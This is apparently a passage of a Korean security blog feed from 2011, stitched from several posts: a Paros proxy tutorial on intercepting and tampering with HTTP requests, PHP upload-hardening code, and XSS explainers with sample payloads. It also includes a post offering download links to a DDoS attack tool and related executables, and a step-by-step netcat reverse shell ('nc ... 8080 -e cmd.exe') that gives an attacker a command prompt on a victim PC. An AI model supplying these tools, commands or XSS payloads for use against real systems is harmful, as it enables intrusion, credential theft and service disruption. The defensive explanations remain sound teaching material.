<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">SSL traffic uses port 8443.</span><br><span style='font-family: 돋움; font-size: 10pt; mso-fareast-language: KO; mso-bidi-font-family: "Times New Roman"; mso-ansi-language: EN-US; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA;'>You can use this port as it is or change it.</span> </p>
<p style="margin: 0cm 0cm 0pt;" align="left"><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1350229996.gif" width="680" height="510" alt="User-inserted image" /></div></p>
<p style="margin: 0cm 0cm 0pt;" align="left"> </p>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;"><br>b. Configuring the web browser proxy</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">Above, we checked the port Paros communicates on.</span> <br><span style="font-family: 돋움;">Next, you have to tell your computer to use Paros as its proxy when it accesses the Internet.<br></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">As shown below, <b style="mso-bidi-font-weight: normal;">in IE go to Tools > Internet Options > Connections > LAN settings</b></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">and specify the proxy address and port.</span> </p>
<p style="margin: 0cm 0cm 0pt;" align="left"><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1250125683.gif" alt="User-inserted image" height="662" width="471" /></div></p>
<p style="margin: 0cm 0cm 0pt;" align="left"> </p>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">Because Paros runs locally and uses port 8080, configure it as shown above.</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">The proxy setup is now complete.</span> <span style="font-family: 돋움;">From now on, Paros acts as the local proxy whenever you browse web sites.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;">
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">3. Using Paros</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">At its most basic, Paros lets you view the packets that the client and server exchange between a web request and its response.</span> <br><span style='font-family: 돋움; font-size: 10pt; mso-fareast-language: KO; mso-bidi-font-family: "Times New Roman"; mso-ansi-language: EN-US; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA;'>The screen below shows the <b style="mso-bidi-font-weight: normal;">request/response messages exchanged</b> when connecting to the mkex.pe.kr site.</span> <br>
<p style="margin: 0cm 0cm 0pt;" align="left"><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1290128328.gif" width="680" height="524" alt="User-inserted image" /></div></p>
<p style="margin: 0cm 0cm 0pt;" align="left"> </p>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">Request data appears in the Request tab and response data in the Response tab.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">
</span><p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="color: red; font-family: 돋움;">4. Intervening in the middle of a request</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">Now we look in earnest at how to use Paros to step into the middle of the communication with the web server, view the data and modify it.</span> <br>
<p style="margin: 0cm 0cm 0pt;" align="left"><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1084674803.gif" alt="User-inserted image" height="523" width="680" /></div></p>
<p style="margin: 0cm 0cm 0pt;" align="left"> </p>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">In the figure above, the <b style="mso-bidi-font-weight: normal;">Trap tab</b> is what makes this possible.</span>
<p style="margin: 0cm 0cm 0pt;">
<p style="margin: 0cm 0cm 0pt;"><span style="color: red; font-family: 돋움;">Checking Trap request and Trap response holds the request/response packets so that you can view and change the data. The request flow then proceeds one step at a time through the Continue button.</span>
<p style="margin: 0cm 0cm 0pt;">
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">With both boxes unchecked, requests and responses go through in one pass; with them checked, each request and response proceeds in sequence only when you click Continue.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">This is how data tampering is done. The figure above shows several HTTP headers; the request is sent after changing some of their values.</span></b> </p>
DDoS attack tool 5.3 openkr https://youngsam.net/entry/%EB%94%94%EB%8F%84%EC%8A%A4-%EA%B3%B5%EA%B2%A9-%ED%88%B4-53 2011-11-12T15:40:29+09:00 2011-11-12T14:52:19+09:00
<span style="font-size: 10pt;">This is said to be the most widely used of the DDoS attack tools. Now that such tools can even be bought on the Internet, attacks may well become more frequent.<br><br>The image comes from a Naver search. Please do not carry out DDoS attacks as a foolish prank. You should know that disrupting networks and disrupting services is also a crime.<br><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/cache/thumbnail/1/1039895279.w680-h524.jpg" width="680" height="524" alt="User-inserted image"/></div><br><div class="imageblock dual" style="text-align: center;"><table cellspacing="5" cellpadding="0" border="0" style="margin: 0 auto;"><tr><td><a class="extensionIcon" href="https://www.youngsam.net/attachment/1025618219.zip"><img src="https://youngsam.net/resources/image/extension/zip.gif" alt="" /> 넷봇8.5.zip</a></td><td><a class="extensionIcon" href="https://www.youngsam.net/attachment/1044863802.zip"><img src="https://youngsam.net/resources/image/extension/zip.gif" alt="" /> 넷봇_2011_조커.zip</a></td></tr></table></div><br>Similar related tools are uploaded as well.<br><br><div class="imageblock dual" style="text-align: center;"><table cellspacing="5" cellpadding="0" border="0" style="margin: 0 auto;"><tr><td><a class="extensionIcon" href="https://www.youngsam.net/attachment/1186655067.rar"><img src="https://youngsam.net/resources/image/extension/unknown.gif" alt="" /> 6688.rar</a></td><td><a class="extensionIcon" href="https://www.youngsam.net/attachment/1237246703.xxx"><img src="https://youngsam.net/resources/image/extension/exe.gif" alt="" /> Cxi12Setup.exe</a></td></tr></table></div></span><p><strong><a 
href="https://youngsam.net/entry/%EB%94%94%EB%8F%84%EC%8A%A4-%EA%B3%B5%EA%B2%A9-%ED%88%B4-53?commentInput=true#entry521WriteComment">Write a comment</a></strong></p>
Hacking a Windows system using nc.exe openkr https://youngsam.net/entry/ncexe-%EB%A5%BC-%EC%9D%B4%EC%9A%A9%ED%95%9C-%EC%9C%88%EB%8F%84%EC%9A%B0-%EC%8B%9C%EC%8A%A4%ED%85%9C-%ED%95%B4%ED%82%B9 2011-11-12T14:45:55+09:00 2011-11-12T14:45:55+09:00
<p>Required tools - attacker (HOST), victim (GUEST)<br><br>nc.exe<div class="imageblock center" style="text-align: center; clear: both;"><a class="extensionIcon" href="https://www.youngsam.net/attachment/1186816754.xxx"><img src="https://youngsam.net/resources/image/extension/exe.gif" alt="" /> nc.exe</a></div></p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1356909717.png" width="668" height="431" alt="User-inserted image" /></div></p><p>1. On the attacker PC, enter nc -l -p 8080 and wait.</p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1322527669.png" width="669" height="438" alt="User-inserted image" /></div></p><p>Then, on the victim PC, enter nc xxx.xxx.xxx.xxx. 8080 -e cmd.exe</p><p>Here, the IP to enter is the attacker's IP.</p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1159901328.png" alt="User-inserted image" height="431" width="668" /></div></p><p>Back on the attacker PC, checking the shell</p><p>shows, as in the figure, that the connection has been made and cmd is running.</p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1184872055.jpg" alt="User-inserted image" height="431" width="668" /></div></p><br /><p>Folders can also be created on the victim PC.</p><br /><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/cache/thumbnail/1/1018449998.w680-h389.jpg" width="680" height="389" alt="User-inserted image"/></div></p><p>As you can see, creating a folder with mkdir makes the folder appear on the victim PC.</p><br /><br />
[Security] Summary of file-upload security openkr https://youngsam.net/entry/%EB%B3%B4%EC%95%88-%ED%8C%8C%EC%9D%BC%EC%97%85%EB%A1%9C%EB%93%9C%EC%99%80-%EA%B4%80%EB%A0%A8%EB%90%9C-%EB%B3%B4%EC%95%88-%EC%A0%95%EB%A6%AC 2011-10-24T12:17:48+09:00 2011-10-24T12:17:48+09:00
I have summarized the security fixes for file upload that have been posted here.<br><br>First,<br>a fix for script execution after a PHP file upload.<br><br>$upload_name = basename($_FILES['upload']['name']); // drop any path sent by the client<br>$UPfile = "$upload_name.zip"; // append .zip to the original uploaded file name<br>$y = 0;<br><br>while (file_exists("./data/$UPfile")) {<br> $y++;<br> $UPfile = "$upload_name@$y.zip"; <br> // if the same name already exists, rename to the name@number form<br>}<br><br>$tfile = substr($UPfile,0,-4); // file name without .zip, stored in the DB<br><br>move_uploaded_file($_FILES['upload']['tmp_name'],"./data/$UPfile") or die("파일 저장에 오류가 있습니다");<br><br>Because the file is actually stored under a .zip name, it cannot be executed and<br>is always downloaded.<br><br>Use the Header function for downloads<br><br>$file = basename($_REQUEST['file']); // requested name with any directory part removed<br>$filename = "./data/$file.zip"; // stored file name <br>$filesize = filesize($filename); // size of the stored file <br>$Tfile = explode("@",$file); // recover the original file name<br>header("Content-Type: application/zip"); <br>header("Content-Disposition: inline; filename=\"$Tfile[0]\""); <br>header("Content-Length: $filesize"); <br>header("Pragma: no-cache"); <br>header("Expires: 0"); <br>$fp=fopen($filename, "rb"); <br>echo fread($fp, $filesize); <br>fclose($fp); <br><br>Second,<br>the problem of downloading files on the server by passing variables via GET, and<br>the case where a user saves the file-transfer form's HTML document to their own PC <br>and passes variables via POST<br><br>$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";<br>// eregi() was removed in PHP 7; stripos() does the same case-insensitive search<br>// the Referer header is supplied by the client, so this is a convenience check, not access control<br>if (stripos($referer, "http://" . $_SERVER['HTTP_HOST']) === false or $_SERVER['QUERY_STRING']) { <br> echo("정상적인 접근 바랍니다"); <br>exit;<br>}<br>
[Security] Checking for malicious script shells openkr https://youngsam.net/entry/%EB%B3%B4%EC%95%88-%EC%95%85%EC%84%B1-%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8A%B8-%EC%89%98-%EC%B2%B4%ED%81%AC%ED%95%98%EA%B8%B0 2011-10-23T12:03:44+09:00 2011-10-23T12:03:44+09:00
The idea is to scan with an antivirus program, just as you would check a PC for viruses.<br><br>For a Linux server:<br><br>First bring up a Samba server, then connect to it locally from a laptop or client.<br><br>Map it as a network drive and scan it with a program such as ALYac.<br><br>As I moved various downloaded utilities, videos and source code onto the server,<br>real-time scanning turned up quite a few Trojans here and there.<br><br>After putting a gigabit hub on the local network, a gigabit NIC in each host<br>and switching to CAT6 cabling, copy speed became roughly 10 times faster.<br><br>Large files such as videos reach 100 MB per second,<br>and small files such as source code about 30 MB.<br><br>That is about on par with copying from a SATA drive attached directly to the motherboard. 
<!-- guard against tag abuse --><p><strong><a href="https://youngsam.net/entry/%EB%B3%B4%EC%95%88-%EC%95%85%EC%84%B1-%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8A%B8-%EC%89%98-%EC%B2%B4%ED%81%AC%ED%95%98%EA%B8%B0?commentInput=true#entry1615WriteComment">Write a comment</a></strong></p>Cross-Site Scriptingopenkrhttps://youngsam.net/entry/Cross-Site-Scripting2011-09-14T02:19:43+09:002011-09-14T02:19:43+09:00<h1>Cross-Site Scripting</h1><p>Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum. The purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example, it could copy user cookies and then send those cookies to the attacker.</p><h2>Details</h2><p>Web sites today are more complex than ever and often contain dynamic content to enhance the user experience. Dynamic content is achieved through the use of Web applications that can deliver content to a user according to their settings and needs.</p><p> While performing different user customizations and tasks, many sites take input parameters from a user and display them back to the user, usually as a response to the same page request. Examples of such behavior include the following.</p><ul class="arrow"><li>Search engines which present the search term in the title ("Search Results for: search_term")</li><li>Error messages which contain the erroneous parameter</li><li>Personalized responses ("Hello, username")</li></ul><p> Cross-site scripting attacks occur when an attacker takes advantage of such applications and creates a request with malicious data (such as a script) that is later presented to the user requesting it. 
The malicious content is usually embedded into a hyperlink, positioned so that the user will come across it in a web site, a Web message board, an email, or an instant message. If the user then follows the link, the malicious data is sent to the Web application, which in turn creates an output page for the user, containing the malicious content. The user, however, is normally unaware of the attack, and assumes the data originates from the Web server itself, leading the user to believe this is valid content from the Web site.</p><p> For example, consider a Web application that requires users to log in to visit an authorized area. When users wish to view the authorized area, they provide their username and password, which is then checked against a user database table. Now, assume that this login system contains two pages: Login.asp, which creates a form for the users to enter their username and password; and the page CheckCredentials.asp, which checks if the supplied username/password are valid. If the username/password are invalid, CheckCredentials.asp uses, for example, a Response.Redirect to send the user back to Login.asp, including an error message string in the query string. The Response.Redirect call will be something like the following.</p><pre>Response.Redirect("Login.asp?ErrorMessage=Invalid+username+or+password")
</pre><p> Then, in Login.asp, the error message query string value would be displayed as follows:</p><pre><img alt="" src="http://www.imperva.com/images/glossary/css_form1.png"></pre><p>Using this technique, when users attempt to login with an invalid username or password, they are returned to Login.asp and a short message is displayed indicating that their username/password were invalid. By changing the ErrorMessage value, an attacker can embed malicious JavaScript code into the generated page, causing execution of the script on the computer of the user viewing the site. For example, assume that Login.asp is being called using the following URL.</p><pre>http://www.somesite.com/Login.asp?ErrorMessage=</pre><p>As in the code for Login.asp, the ErrorMessage query string value will be emitted, producing the following HTML page:</p><pre><img alt="" src="http://www.imperva.com/images/glossary/css_form2.png"></pre><p>The attacker embedded HTML code into this page in such a way that when users browse this page, their supplied username and password are submitted to the following page.</p><pre>http://www.hax0r.com/stealPassword.asp
</pre><p>An attacker can send a link to the contrived page via an email message or a link from some message board site, hoping that a user will click on the link and attempt to login. Of course, by attempting to login, the user will be submitting his username and password to the attacker's site.</p><h2>Prevention</h2><p>Cross-site scripting is one of the easiest attacks to detect, yet many Intrusion Prevention Systems fail to do so. The reason why cross-site scripting can be easily detected is that unlike most application level attacks, cross-site scripting can be detected using a signature. The simple text pattern "&lt;script" can be used to detect attacks. However, trying to detect that pattern on the entire HTTP stream would yield a high rate of false positives. For example, the outbound HTTP stream contains legitimate instances of cross-site scripting (client side scripts).</p><p>To accurately detect cross-site scripting attacks the product must know where and when to look for that signature. Most cross-site scripting attacks occur either with error pages or with parameter values. Therefore the product needs to look for cross-site scripting signatures either within parameter values or within requests that return error messages. To look for signatures in parameters values the product must parse the URL correctly and retrieve the value part and then search for the signature on the value while overcoming encoding issues. To look for signatures in pages that return error messages the product needs to know that the specific URL returned an error code. 
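The scoping described above (signature search in decoded parameter values, and in the request path only when the response was an error), as an added JavaScript example that is not from the original article or from any product. The function names, the decode-round limit and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: look for the "<script" signature only where the article says to look.
const SIGNATURE = /<script/i;   // the simple text pattern named in the article
const MAX_DECODE_ROUNDS = 3;    // assumption: how many nested encodings to unwrap

// Percent-decode repeatedly so a double-encoded value (%253Cscript) is still seen.
function decodeValue(raw) {
  let current = raw.replace(/\+/g, " ");
  for (let round = 0; round < MAX_DECODE_ROUNDS; round++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (err) {
      break; // malformed escape such as a trailing "%": keep what we have
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Split a request target into its decoded path and decoded name/value pairs.
function parseTarget(target) {
  const noFragment = target.split("#")[0];
  const q = noFragment.indexOf("?");
  const path = q === -1 ? noFragment : noFragment.slice(0, q);
  const query = q === -1 ? "" : noFragment.slice(q + 1);
  const params = query.split("&").filter(Boolean).map((pair) => {
    const eq = pair.indexOf("=");
    return {
      name: decodeValue(eq === -1 ? pair : pair.slice(0, eq)),
      value: decodeValue(eq === -1 ? "" : pair.slice(eq + 1)),
    };
  });
  return { path: decodeValue(path), params };
}

// Parameter values are always inspected; the path only when the server
// answered with an error status (the "error page" case).
function inspectRequest(target, statusCode) {
  const { path, params } = parseTarget(target);
  const where = params
    .filter((p) => SIGNATURE.test(p.value))
    .map((p) => "param:" + p.name);
  if (statusCode >= 400 && SIGNATURE.test(path)) where.push("path");
  return { suspicious: where.length > 0, where };
}

// What the article warns against: matching anywhere in the HTTP stream.
function naiveStreamMatch(text) {
  return SIGNATURE.test(text);
}

// Constructed sample traffic: [request target, response status].
const SAMPLE_REQUESTS = [
  ["/Login.asp?ErrorMessage=Invalid+username+or+password", 200],
  ["/sillypage.php?foo=%22%3E%3Cscript%3Einsert-evil-script-here%3C/script%3E%3C%22", 200],
  ["/search?q=%253Cscript%253Eplaceholder%253C%252Fscript%253E", 200],
  ["/missing/%3Cscript%3Eplaceholder%3C/script%3E", 404],
];
// Constructed benign response body: a legitimate client-side script tag.
const BENIGN_RESPONSE = '<html><script src="/site.js"></script></html>';

for (const [target, status] of SAMPLE_REQUESTS) {
  console.log(status, target, JSON.stringify(inspectRequest(target, status)));
}
console.log("naive match on benign response:", naiveStreamMatch(BENIGN_RESPONSE));
```

The benign response body trips the stream-wide match, while the scoped check flags only the requests whose decoded parameter values or error-page paths carry the signature.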
Intrusion Detection and Prevention Systems which are not Web application oriented simply do not implement these very advanced capabilities.</p><p><strong><a href="https://youngsam.net/entry/Cross-Site-Scripting?commentInput=true#entry1549WriteComment">Write a comment</a></strong></p>What is cross site scriptingopenkrhttps://youngsam.net/entry/What-is-cross-site-scripting2011-09-14T02:17:46+09:002011-09-14T02:17:46+09:00<h2 id="xss">What is cross site scripting</h2><p>Cross site scripting (XSS) is where one site manages to run a script on another site, with the privileges of you, the user.</p><p>In many pages, this would be completely harmless. But now imagine that you have logged into site A, and that site has used a session cookie to store your identity. If site B manages to make you load a page on site A containing a script they have injected into it, that script could take the cookie for site A, and send it to site B. The person running site B can now use your cookie in their own browser, and can now use site A, making it think they are you.</p><p>In the case of site A being a blog or forum, they could erase or alter your posts, add new abusive posts, or erase your account. In the case of Web mail systems, they could send abusive email to your colleagues, delete any emails, or read all the passwords you have been sent in your email, which may give them access to even more systems. In the case of it being a banking site, they could make large cash transactions using your bank account. In the case of banking or shopping sites, they could obtain your banking details, and use them to make their own purchases.</p><p>XSS can also be a problem from users on shared sites, such as forums or blog comments, where users may find a way to inject scripts into page content, where the exploit can survive much longer than just a single page load.</p><p>Cookies are not the only target of cross site scripting, but they are a very easy way to exploit a simple mistake made by the site author. 
In some cases, it may be possible to inject a script onto the login form of the site, and convince you to fill it in, and then they can make it send them your password. Or they could simply make it load another page on the site, submitting form data to it, or using other means to perform actions on your behalf.</p><p>Unlike phishing scams where a site tries to trick users into thinking it is another site, XSS <em>is</em> the real site, not a fake. It has just allowed another site to run a script on it, in the context of one of its users.</p><h2 id="xsrf">What is cross site request forgery</h2><p>Cross Site Request Forgery (XSRF or CSRF), also known as Cross Site Reference Forgery, is similar in some respects to XSS, but very different in one important respect. It does not rely at all on being able to inject a script. It is more unreliable, but its effects can be just as damaging.</p><p>The general idea of XSRF is that while you are logged into site A, you also look at a page on site B. Site B is evil, and submits form data to site A, or requests Web pages from site A using some other means. Since you are logged into site A, it uses the form data as if you yourself sent it. That may then do all of the same things as XSS attacks, such as creating forum posts, or making bank transactions.</p><p>Having strong passwords that cannot be guessed or calculated is always a good idea, but XSRF (and XSS) bypasses that part of the protection, as it works once the user has logged themself into the site using their strong password.</p><h2 id="blame">Who is to blame</h2><p>Blame is a fairly harsh word, since it is the attacking site B that is really to blame, but evil sites are a fact of life, and site A should protect its users. XSS in particular is always the result of a mistake on the part of the site with the vulnerability. 
XSS is also worryingly common, many sites make the basic mistakes that allow XSS attacks.</p><h2 id="userprotect">How can users protect themselves</h2><p>Most users are not even aware that XSS and XSRF are possible. And they should not need to be. Users should not be expected to be security experts - if they were, you as a Web developer would be out of a job. However, users who wish to protect themselves can take a few steps to do so.</p><p>The basic step is to never open other sites while you are logged into a site. This means that while you are logged into your bank, shopping site, blog, forum, web mail, side admin section, etc., never open another site in any window. Do not click links in emails, or other applications. If you use Internet Explorer (I recommend against this if you value your security), do not run programs like Word (that includes opening attachments in email), or generally any other programs that view Web pages, as many Windows programs use the Internet Explorer engine either directly or via macros, and may be used as a vector for these attacks.</p><p>If the site uses cookies to log you in, make sure you <em>log out</em> when you are finished using it. If the site does not allow you to log out, or if it uses HTTP authentication, then restart your browser. If the site uses a cookie based login but not session cookies, and does not allow you to log out, then you may find that your browser allows you to delete those cookies manually.</p><p>The next step is to disable JavaScript while logged into a site. This may seem like a drastic measure, but it will protect against virtually all XSS (but not XSRF) attacks. Unfortunately, many sites will not allow you to use them without JavaScript, so this step may not be possible. If the site is important enough, such as a bank, but still does not allow you to disable JavaScript, then I suggest you use a different bank.</p><p>You may also want to disable iframes if your browser (such as Opera) allows that. 
This step should not be necessary as long as you do not browse other sites at the same time, but if you do, it makes it a little harder for XSRF attacks to be carried out, as most (but by no means all) of them use iframes.</p><p>All of these measures are extremely limiting, and certainly not something most users would want to do. So the final step will always be the one that is preferred: Make sure the sites you log into have actually checked their sites for XSS and XSRF attacks. Not just that they are aware that they exist, or believe they are safe, but that they have actually run checks to make sure they are protected against those attacks.</p><h3 id="logintype">How do you know what type of login a site is using</h3><p>Cookie logins are fairly easy to identify. They are almost always what can be seen as a form on a Web page, asking you for a username or email address and password. HTTP authentication (or similar types of authentication) are shown as a dialog that appears in its own little dialog window in front of the Web page, asking you for a username and password.</p><p>Shopping sites almost always use either a cookie or a URL encoded session ID, and virtually never use HTTP authentication. In general, you can tell which they are using by looking at the page address. If it contains a large amount of seemingly random characters (usually near the end of the address), then it is probably using a URL encoded session ID. Otherwise it will be using a cookie.</p><p>Working out if a cookie is a session cookie or not is a little harder. Some browsers may allow you to see the properties of stored cookies, or to prompt for them with their details when the server tries to set them. However, a simple test is to log into the site, then without logging out, close all browser windows, then restart the browser, and try reloading pages on the site. 
If you are still logged in, then it is not a session cookie.</p><p>There are some alternative types of login, such as using a client certificate (which you will normally have been asked to install at some point), or IP based authentications (typically used on local intranets). It is not normally possible to log out from either of these, even by restarting your browser. In general, you can identify these either because you had been asked to install a client certificate (not a normal root certificate), or because you never had to log in in the first place.</p><h2 id="protectweb">How can Web sites protect themselves</h2><p>These are very complex issues, and there are no simple solutions, but there are certain things that the site should always do. In almost all cases, it is server side scripting that needs to be changed or fixed.</p><h3 id="xssprotect">Cross site scripting</h3><p>This is by far one of the most common mistakes made by Web authors, and turns up on a substantially high number of sites - even those you would expect to be written by knowledgeable authors. Some even dismiss these mistakes as harmless, or trivial, ignoring the dangers of what those mistakes can present.</p><p>The vulnerabilities themselves are almost never created by sites having poorly written JavaScripts. XSS vulnerabilities are usually caused by a server side script that allows another site to put a new and dangerous JavaScript on the page. A site does not need to have any JavaScripts of its own for it to be vulnerable to XSS attacks.</p><p>Let us take this simple example; somewhere on a site, there is a form that a user can fill in. If they fill it in with invalid details, the form is displayed again, with what they typed last time shown in the form inputs, allowing them to change whatever was wrong. This is often done with login forms, although it could in fact be any form on the site while they are logged in. 
On its own, this is not dangerous at all, and is in fact a very good thing.</p><p>The problem is that some sites forget to escape the data before putting it back into the form. Assume that the form had this:</p><pre><code><input name="foo" value=""></code></pre><p>Now assume that the site displays it to the user like this (I will use PHP here, but it could in fact be any server side language):</p><pre><code><input name="foo" value="<?php
print $foo;
?>"></code></pre><p>With that single, simple <var>print</var> command, the site has opened itself up to XSS attacks. Imagine now that the evil site uses an iframe, link, image URL or form submission to the url:</p><pre><code>http://goodsite.com/sillypage.php?foo=%22%3E%3Cscript%3Einsert-evil-script-here%3C/script%3E%3C%22</code></pre><p>The server side script would then create this in the page source code:</p><pre><code><input name="foo" value=""><script>insert-evil-script-here</script><""></code></pre><p>The implications of this are immediately obvious. The evil script could then load other pages on the site using XMLHttpRequest, even taking any URL encoded session ID into account, and in doing so it could add or change data, or make form submissions, etc. It could also read any session cookies, and send them back to the evil site as part of a URL using an iframe, image, script, stylesheet, or just about any type of external content. The possibilities are fairly limitless. This simple change would have protected the site:</p><pre><code><input name="foo" value="<?php
print htmlspecialchars($foo);
?>"></code></pre><p>Although forms are the most common place where this happens, it is not the only time this can be a problem. The same situation occurs if a site writes unescaped content as part of any page content - for example, many pages use a single page that writes whatever information it was passed as a page heading.</p><pre><code>sillypage.php?content=%3Ch1%3EPage%203%3C/h1%3E</code></pre><p>Note that even if scripting is prevented by other means, an attack could, for example, display a false login form to the user, that sends the details to another site. They could also display misleading information. Though not as harmful as a XSS vulnerability, as it needs the user to be tricked into following those instructions, this is still a problem that needs to be prevented.</p><h4 id="escapedata">Escaping data</h4><p>So the solution is to ensure that if contents like this are entered into the form, that the server side script escapes them before adding them to the page content. HTML offers a simple way to escape these; use HTML entities for < >& and " characters. Yes, for virtually all situations, this really is all it takes. PHP offers a simple function to do this; <var>htmlspecialchars</var>. Other languages sometimes offer ways to do this, but some do not. One of the big offenders is JSP which, to my knowledge, has no equivalent method. Authors simply do not realise they should create one for themselves. Many JSP pages are left open to XSS attacks as a result.</p><p>It is not enough to escape just < and > characters, since quotes can be just as damaging inside an attribute. If quotes are not escaped, the attribute can be ended, and a new event handler attribute started, that triggers when the user clicks it, or focuses it, or moves their mouse over it. 
If you are putting the content inside an attribute, make sure the attribute uses " (double) quotes, or the attribute could also be ended simply by including a space (if using ' [single] quotes around the attribute value, make sure you tell PHP's <var>htmlspecialchars</var> function to convert those as well inside the attribute value).</p><p>Form data must also be escaped before using it as part of a database query, typically by putting backslashes before quotes (again, PHP has inbuilt methods for doing this). Failure to escape it could allow people to end the query, and start a second one, deleting random data, corrupting databases, or at worst, being able to run shell commands, and take over the server. A similar situation could occur if your script uses that data to construct a shell command.</p><h4 id="trusturl">Never trust URLs you are given</h4><p>Some pages allow a form to submit a "next URL" value, that the user will be redirected to after the data has been processed. Sometimes this is done with a Location header, but sometimes it is done with a meta refresh or JavaScript. With meta refreshes and JavaScript, if the URL that is given is a 'javascript:' URL, then the script will run. A malicious site could easily use this as a way to post scripts onto a page. Always check that URLs provided as form data start with a trusted protocol, such as 'http:' or 'https:'.</p><h4 id="carefulscript">Being careful with scripts</h4><p>In very rare cases, cross site scripting vulnerabilities are created within JavaScripts. Although far less common than server-side script mistakes, it is still possible to make equivalent mistakes in JavaScript. JavaScripts can read data passed in the URL, and must be careful how they process that data. 
If they assign that data to any object that accepts url values, such as the <var>src</var> of an image or the <var>location</var> object, any scripts can be injected into it.</p><p>An example of where this usually occurs is an image gallery script, where the image to display is passed as a parameter to the page address, and a script then extracts it to display the image. If a script accepts URLs as a parameter, it must always check that the URL starts with a trusted protocol, such as 'http:' or 'https:', or it will leave itself open to this sort of attack:</p><pre><code>http://goodsite.com/gallery.html?showimage=javascript:evil-script-here</code></pre><p>Similarly, if the data is evaluated by the page using the <var>eval</var> or an equivalent method, attackers can simply feed their script directly into that parameter. A script must <em>never</em> evaluate something passed as a parameter to the page.</p><h4 id="httponly">Using HTTP-only cookies</h4><p>Cookies that are set via HTTP (such as authentication cookies) are also available to scripts. One of the most common demonstrations used for cross site scripting, is taking another user's login cookie, and then performing some action as them. If the cookie was not available to scripts, they could not take them. Internet Explorer and recent versions of some other browsers allow an optional 'httponly' parameter when setting HTTP cookies, which prevents them from being accessible to scripts.</p><p>This is not a solution, as it has only limited scope. For a start, this is only useful if <em>all</em> browsers support it - as I have already said, the exploit only needs to work once in one browser for it to be successful. More importantly, however, cookies are rarely used in real exploits. Someone who manages to inject a script into someone else's page is not very likely to use their cookie themselves, as that would immediately give away their IP address, making it easier to locate and prosecute them. 
They are far more likely to run a script there and then, to do the damage through the user themself. HTTP-only cookies give a false sense of security; they may protect some people from demonstrations, but they will not protect from real attacks.</p><p>Of course, the main point is that it should never be allowed to get to this stage. XSS should be prevented at all costs. If you have a XSS vulnerability in your site, then cookie stealing is the least of your problems. Fix the real problem, not the symptom.</p><h4 id="httpauth">Using HTTP authentication</h4><p>HTTP authentication is like the HTTP-only cookie, except that it works in all browsers. It still suffers from the same false sense of security, however, and in addition, no browser currently allows you to log out of it, meaning it is more susceptible to delayed XSRF attacks.</p><h4 id="safecookie">Storing safer cookies</h4><p>Some sites take the simple approach of saving the user's username and password in the cookie. This is an instant giveaway if a XSS attack manages to get the cookie, as they have the username and password. Even if the user logs out, the attacker can log in again. It is better to store a unique session ID. That way, if they log out and the server invalidates the session, the attacker can no longer do anything with the cookie. To make it even harder for an attacker, the server can tie the session ID to the user's IP address. Attackers would have to be able to use the same IP address for them to exploit it - this is possible (for example, they may be behind the same NAT), but it makes it much harder.</p><p>However, again, cookies are only a minor concern considering that the XSS vulnerability can be exploited in a number of ways, that do not need any cookie at all.</p><h4 id="certainhtml">Allowing only certain HTML input</h4><p>Some people want to allow certain HTML to be used, but not others. 
